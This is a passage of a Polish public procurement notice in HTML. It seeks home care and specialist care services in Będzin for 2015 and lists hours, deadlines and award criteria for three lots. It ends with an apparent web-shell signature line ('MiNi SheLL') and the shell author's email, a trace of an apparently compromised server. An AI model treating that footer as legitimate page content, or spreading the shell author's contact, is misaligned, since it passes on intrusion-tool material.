w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, 
zgodnie z warunkami określonymi we wzorze umowy, stanowiącym załącznik nr 7 
do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bedzin.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego, to jest w Miejskim Ośrodku Pomocy Społecznej w Będzinie, kod pocztowy: 42-500, przy ul. 11-go Listopada 1, w sekretariacie - pokój numer 40.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2014 godzina 10:00, miejsce: W siedzibie Zamawiającego, to jest w Miejskim Ośrodku Pomocy Społecznej w Będzinie, kod pocztowy: 42-500, przy ul. 11-go Listopada 1, w sekretariacie - pokój numer 40.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa objęta przedmiotem niniejszego zamówienia jest usługą niepriorytetową określoną 
w rozporządzeniu Prezesa Rady Ministrów z dnia 28 stycznia 2010 r. w sprawie wykazu usług o charakterze priorytetowym i niepriorytetowym (Dz. Nr 12, poz. 68). Mając 
na uwadze powyższe, do niniejszego postępowania ma zastosowanie art. 5 ust. 1 ustawy. Zgodnie z art. 5 ust. 1 ustawy - do postępowań o udzielenie zamówień, 
których przedmiotem są usługi o charakterze niepriorytetowym określone w przepisach wydanych na podstawie art. 2a i 2b ustawy, nie stosuje się przepisów ustawy dotyczących terminów składania ofert, obowiązku żądania wadium, obowiązku żądania dokumentów potwierdzających spełnianie warunków udziału w postępowaniu oraz zakazu ustalania kryteriów oceny ofert na podstawie właściwości wykonawcy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług opiekuńczo - gospodarczych 
dla osób dorosłych wymagających pomocy Miejskiego Ośrodka Pomocy Społecznej 
w Będzinie wykonywanych w miejscu zamieszkania tych osób, obejmujących pomoc 
w zaspokajaniu codziennych potrzeb życiowych, opiekę higieniczną, zalecaną przez lekarza pielęgnację oraz w miarę możliwości zapewnienie kontaktów z otoczeniem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana ilość godzin do wykonania - maksymalnie 6.500  godzin zegarowych miesięcznie, to jest 78.000 godzin zegarowych w skali 12 miesięcy, przy czym Wykonawcy nie przysługuje roszczenie zlecenia maksymalnej liczby godzin.
Zamawiający zastrzega sobie prawo zmiany ilości godzin przedmiotu niniejszego zamówienia w zależności od wysokości posiadanych środków w roku budżetowym 
2015 oraz w zależności od potrzeb wynikających ze zmiennej liczby osób kwalifikujących się do danego rodzaju usług objętych przedmiotem niniejszego zamówienia. 
W przypadku zlecenia niepełnej liczby godzin, Wykonawcy będzie przysługiwać wyłącznie wynagrodzenie za faktycznie zrealizowane usługi i nie będzie on zgłaszać roszczeń 
co do realizacji pozostałej części zmówienia. Minimalny wymiar godzin świadczonych usług w pełnym okresie realizacji przedmiotu niniejszego zamówienia w przypadku Zadania nr 1 (części nr 1 zamówienia) wynosi 62.500 godzin.
Szczegółowe informacje dotyczące opisu, zakresu i warunków realizacji przedmiotu zamówienia określa Rozdział II SIWZ - Opis i określenie przedmiotu zamówienia
oraz wzór umowy stanowiący załącznik nr 7 do Specyfikacji Istotnych Warunków Zamówienia, zwanej dalej SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie zawodowe osób, które będą uczestniczyć w wykonywaniu zamówienia - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie specjalistycznych usług opiekuńczych dla dzieci, młodzieży i osób dorosłych, z wyłączeniem specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi, wymagających pomocy Miejskiego Ośrodka Pomocy Społecznej w Będzinie wykonywanych w miejscu zamieszkania tych osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana ilość godzin do wykonania - maksymalnie 292 godzin zegarowych miesięcznie, 
to jest 3.504 godzin zegarowych w skali 12 miesięcy, przy czym Wykonawcy 
nie przysługuje roszczenie zlecenia maksymalnej liczby godzin.
Zamawiający zastrzega sobie prawo zmiany ilości godzin przedmiotu niniejszego zamówienia w zależności od wysokości posiadanych środków w roku budżetowym 
2015 oraz w zależności od potrzeb wynikających ze zmiennej liczby osób kwalifikujących się do danego rodzaju usług objętych przedmiotem niniejszego zamówienia. 
W przypadku zlecenia niepełnej liczby godzin, Wykonawcy będzie przysługiwać wyłącznie wynagrodzenie za faktycznie zrealizowane usługi i nie będzie on zgłaszać roszczeń 
co do realizacji pozostałej części zmówienia. Minimalny wymiar godzin świadczonych usług w pełnym okresie realizacji przedmiotu niniejszego zamówienia w przypadku Zadania nr 2 (części nr 2 zamówienia) wynosi 2.800 godzin.
Szczegółowe informacje dotyczące opisu, zakresu i warunków realizacji przedmiotu zamówienia określa Rozdział II SIWZ - Opis i określenie przedmiotu zamówienia
oraz wzór umowy stanowiący załącznik nr 7 do Specyfikacji Istotnych Warunków Zamówienia, zwanej dalej SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie zawodowe osób, które będą uczestniczyć w wykonywaniu zamówienia - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie specjalistycznych usług opiekuńczych dla dzieci, młodzieży i osób dorosłych z zaburzeniami psychicznymi, wymagających pomocy Miejskiego Ośrodka Pomocy Społecznej w Będzinie wykonywanych w miejscu zamieszkania tych osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana ilość godzin do wykonania - maksymalnie 585 godzin zegarowych miesięcznie, to jest 7.020 godzin zegarowych w skali 12 miesięcy, przy czym Wykonawcy nie przysługuje roszczenie zlecenia maksymalnej liczby godzin.
Zamawiający zastrzega sobie prawo zmiany ilości godzin przedmiotu niniejszego zamówienia w zależności od wysokości posiadanych środków w roku budżetowym 
2015 oraz w zależności od potrzeb wynikających ze zmiennej liczby osób kwalifikujących się do danego rodzaju usług objętych przedmiotem niniejszego zamówienia. 
W przypadku zlecenia niepełnej liczby godzin, Wykonawcy będzie przysługiwać wyłącznie wynagrodzenie za faktycznie zrealizowane usługi i nie będzie on zgłaszać roszczeń 
co do realizacji pozostałej części zmówienia. Minimalny wymiar godzin świadczonych usług w pełnym okresie realizacji przedmiotu niniejszego zamówienia w przypadku Zadania nr 3 (części nr 3 zamówienia) wynosi 5.600 godzin.
Szczegółowe informacje dotyczące opisu, zakresu i warunków realizacji przedmiotu zamówienia określa Rozdział II SIWZ - Opis i określenie przedmiotu zamówienia
oraz wzór umowy stanowiący załącznik nr 7 do Specyfikacji Istotnych Warunków Zamówienia, zwanej dalej SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com